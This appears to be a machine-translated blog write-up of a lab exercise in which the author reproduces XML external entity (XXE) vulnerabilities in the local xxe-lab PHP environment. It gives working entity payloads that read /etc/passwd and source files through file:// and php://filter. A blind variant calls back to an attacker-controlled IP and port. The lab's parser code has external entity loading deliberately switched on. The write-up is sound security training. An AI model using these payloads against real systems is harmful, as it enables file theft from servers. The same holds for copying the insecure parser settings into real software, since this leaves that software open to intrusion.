当前位置:网站首页>Security xxE vulnerability recurrence (XXe Lab)
Security xxE vulnerability recurrence (XXe Lab)
2022-07-06 03:49:00 【Fox FM】
List of articles
Preface
Installation skipped ,xxe-lab There are several environments , Here is php
Learning records only , Do not use for illegal purposes
XXE Not very familiar with , If there are any mistakes, you can correct them in the comments
XML External entities (XXE) Inject detailed explanation
Security -php://filter The file contains analysis (bugku)
XXE Inject high-end operation attacks payload Summary
One 、 Enable environment
Turn on apache or nginx, visit
http://127.0.0.1/xxe-lab-master/php_xxe/
If 127.0.0.1 I can't get the bag , You can use the intranet IP Visit the packet capture to view the submitted data
Two 、 Loophole recurrence
[1]. analysis
Use the playback module , It is found that... Will be returned in the return package
username
What's in it ( Slightly changed the format )
So only willEntity
Put it inusername
in , Will echo the value
[2]. structure payload
add to XML Statement ( It seems that you can do without this )
<?xml version="1.0" encoding="UTF-8"?>
DTD
Document type definition , Arbitrary file name will not affect , Be carefulDOCTYPE
Need to be capitalizedDOC
Represents a document ,TYPE
Translated as type
<!DOCTYPE file name []>
Then there is the statement XML Entities are used for file reading , Need to put in
DOCTYPE
Oftest
in
<!ENTITY The entity name SYSTEM "file:/// Absolute path ">
Then choose one that will echo the data xml Label placement
& The entity name ;
c:/windows/win.ini
yes windows The default configuration in/etc/passwd
yes linux Configuration of account information stored in
In the case of echo ,
password
call xml Solid time , No echo passwd The content of cannot passpassword
The label proves the existence xxe Loophole
[3]. Read file from relative path
file
The protocol is used to read absolute paths , If you need to read through a relative path, you can usephp://filter
- post Data time , What I visited was
doLogin.php
file
It needs to be based on the relative path to this file- When reading with the parameters below, the contents of the file will be
base64
Output
php://filter/read=convert.base64-encode/resource= File relative path
- Read the current file
doLogin.php
file ( If you don't know what the file name is , You can use it intruder Blasting module ),base64
After decoding, it is the content of the file- The case of the file name will not affect
PD9waHAKLyoqCiogYXV0b3I6IGMwbnkxCiogZGF0ZTogMjAxOC0yLTcKKi8KCiRVU0VSTkFNRSA9ICdhZG1pbic7IC8v6LSm5Y+3CiRQQVNTV09SRCA9ICdhZG1pbic7IC8v5a+G56CBCiRyZXN1bHQgPSBudWxsOwoKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7CiR4bWxmaWxlID0gZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0Jyk7Cgp0cnl7CgkkZG9tID0gbmV3IERPTURvY3VtZW50KCk7CgkkZG9tLT5sb2FkWE1MKCR4bWxmaWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CgkkY3JlZHMgPSBzaW1wbGV4bWxfaW1wb3J0X2RvbSgkZG9tKTsKCgkkdXNlcm5hbWUgPSAkY3JlZHMtPnVzZXJuYW1lOwoJJHBhc3N3b3JkID0gJGNyZWRzLT5wYXNzd29yZDsKCglpZigkdXNlcm5hbWUgPT0gJFVTRVJOQU1FICYmICRwYXNzd29yZCA9PSAkUEFTU1dPUkQpewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDEsJHVzZXJuYW1lKTsKCX1lbHNlewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDAsJHVzZXJuYW1lKTsKCX0JCn1jYXRjaChFeGNlcHRpb24gJGUpewoJJHJlc3VsdCA9IHNwcmludGYoIjxyZXN1bHQ+PGNvZGU+JWQ8L2NvZGU+PG1zZz4lczwvbXNnPjwvcmVzdWx0PiIsMywkZS0+Z2V0TWVzc2FnZSgpKTsKfQoKaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwplY2hvICRyZXN1bHQ7Cj8+
You can also use
../
Jump to the upper directory to read
IyB4eGUtbGFiCgohW1hYRS1MYWJdKGRvYy9YWEUtTEFCLnBuZykKCnh4ZS1sYWLmmK/kuIDkuKrkvb/nlKhwaHAsamF2YSxweXRob24sQyPlm5vnp43lvZPkuIvmnIDluLjnlKjor63oqIDnmoTnvZHnq5nnvJblhpnor63oqIDmnaXnvJblhpnnmoTkuIDkuKrlrZjlnKh4eGXmvI/mtJ7nmoR3ZWIgZGVtb+OAggoK55Sx5LqOeHhl55qEcGF5bG9hZOWcqOS4jeWQjOeahOivreiogOWGhee9rueahHhtbOino+aekOWZqOS4reino+aekOaViOaenOS4jeS4gOagt++8jOS4uuS6hueglOeptuWug+S7rOeahOS4jeWQjOOAguaIkeWIhuWIq+S9v+eUqOW9k+S4i+acgOW4uOeUqOeahOWbm+enjee9keermee8luWGmeivreiogOWGmeS6huWtmOWcqHh4Zea8j+a0nueahHdlYiBkb21lLOS4uuS6huS7peWQjuW+l+a1i+ivleaWueS+v++8jOWwseWwhui/meS6m2RlbW9l5pW05ZCI5Li6eHhlLWxhYuOAguS7o+eggeWKm+axgueugOa0geeugOWNle+8jOWwvemHj+WPquS9v+eUqOWOn+eUn+W6k++8jOWQjOaXtuWcqOazqOmHiumDqOWIhuWMheWQq+S6huS/ruWkjea8j+a0nueahOS7o+eggeOAgnJ1YnnniYjmnKzmnInml7bpl7Tlho3liqDlhaXvvIEKCiMjIOWuieijhQojIyMjIDEucGhwX3h4ZQoK55u05o6l5pS+5ZyocGhwIHdlYumhtemdouS4i+WNs+WPr+i/kOihjOOAggoKIyMjIyAyLmphdmFfeHhlCgpqYXZhX3h4ZeaYr3Nlcmx2ZXTpobnnm67vvIznm7TmjqXlr7zlhaVlY2xpcHNl5b2T5Lit5Y2z5Y+v6YOo572y6L+Q6KGM44CCCgojIyMjIDMucHl0aG9uX3h4ZTogCgoqIOWuieijheWlvUZsYXNr5qih5Z2XCiogcHl0aG9uIHh4ZS5weQoKIyMjIyA0LkNzaGFycF94eGUgCuebtOaOpeWvvOWFpVZT5Lit6L+Q6KGMCiMjIOS4u+eVjOmdogoKIVtwaHBfeHhlXShkb2MvcGhwX3h4ZS5wbmcpCgohW2phdmFfeHhlXShkb2MvamF2YV94eGUucG5nKQoKIVtweXRob25feHhlXShkb2MvcHl0aG9uX3h4ZS5wbmcpCgohW0NzaGFycF94eGVdKGRvYy9Dc2hhcnBfeHhlLnBuZykKCiMjIOa1i+ivlQrmkK3lu7rlpb3njq/looPlkI7lsLHlj6/ku6Xlr7nlkITkuKror63oqIDniYjmnKzov5vooYzmtYvor5XkuobjgILov5nph4zku6VQSFDkuLrkvovlrZDjgIIKCiFbcGhwIFhYRea8lOekul0oZG9jL3BocF94eGVfZGVtby5naWYpCg==
3、 ... and 、 No echo XXE
take
doLogin.php
Change to the following code , In this way, there will be no originalusername
了
<?php
/** * autor: c0ny1 * date: 2018-2-7 */
$USERNAME = 'admin'; // account number
$PASSWORD = 'admin'; // password
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try{
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$username = $creds->username;
$password = $creds->password;
if($username == $USERNAME && $password == $PASSWORD){
$result = " Login successful ";
//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
}else{
$result = " Login failed ";
//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
}
}catch(Exception $e){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
If the goal is not to leave the network , have access to python Here's one http service
If the access record of the target is detected , That means there is xxe There's a leak
python -m http.server [ port ]
python2 Start with the following code http service
python -m SimpleHTTPServer [ port ]
then post As follows xml sentence
<!DOCTYPE test[ <!ENTITY data SYSTEM "http:// The attacker IP: port "> ]>
Because the submitted
username
andpassword
Are processed by the server , But none of them echo
So without echo , These two parameters call xml Entities will trigger vulnerabilities
边栏推荐
- Factors affecting user perception
- Facebook and other large companies have leaked more than one billion user data, and it is time to pay attention to did
- BUAA magpie nesting
- Overview of super-resolution reconstruction of remote sensing images
- Ks003 mall system based on JSP and Servlet
- 1. New project
- Svg drag point crop image JS effect
- 多项目编程极简用例
- How do we make money in agriculture, rural areas and farmers? 100% for reference
- Quick sort function in C language -- qsort
猜你喜欢
Canvas cut blocks game code
数据分析——seaborn可视化(笔记自用)
2.13 weekly report
Pointer written test questions ~ approaching Dachang
[Massey] Massey font format and typesetting requirements
Cubemx 移植正点原子LCD显示例程
JVM的手术刀式剖析——一文带你窥探JVM的秘密
Edcircles: a real time circle detector with a false detection control translation
BUAA喜鹊筑巢
Pytoch foundation - (1) initialization of tensors
随机推荐
3.2 detailed explanation of rtthread serial port device (V2)
Alibaba testers use UI automated testing to achieve element positioning
3.1 detailed explanation of rtthread serial port device (V1)
Prime protocol announces cross chain interconnection applications on moonbeam
遥感图像超分辨重建综述
[001] [stm32] how to download STM32 original factory data
C#(二十七)之C#窗体应用
Ks008 SSM based press release system
简述C语言中的符号和链接库
自动化测试怎么规范部署?
如何修改表中的字段约束条件(类型,default, null等)
JS music online playback plug-in vsplayaudio js
【FPGA教程案例12】基于vivado核的复数乘法器设计与实现
Serial port-rs232-rs485-ttl
Schnuka: what is visual positioning system and how to position it
Schnuka: visual positioning system working principle of visual positioning system
Mathematical modeling regression analysis relationship between variables
【FPGA教程案例11】基于vivado核的除法器设计与实现
Ethernet port &arm & MOS &push-pull open drain &up and down &high and low sides &time domain and frequency domain Fourier
How do we make money in agriculture, rural areas and farmers? 100% for reference